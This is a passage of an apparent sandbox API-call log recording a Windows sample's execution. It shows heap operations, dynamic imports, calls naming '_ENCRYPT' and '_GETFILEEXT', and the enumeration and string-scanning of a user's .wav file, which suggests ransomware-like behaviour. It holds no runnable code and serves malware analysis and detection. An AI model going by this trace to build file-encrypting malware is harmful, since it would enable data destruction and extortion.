0x8e1b50 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.402] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.403] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0187.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.403] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0187.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.403] CloseHandle (hObject=0x138) returned 1 [0187.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.404] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.405] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.405] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.405] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.405] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.405] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.405] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.405] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.405] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.406] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.406] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x91c4fd00, ftLastWriteTime.dwHighDateTime=0x1d5e17f, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 0x90add8 [0187.407] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.407] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x91c4fd00, ftLastWriteTime.dwHighDateTime=0x1d5e17f, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 0x90add8 [0187.408] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.408] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 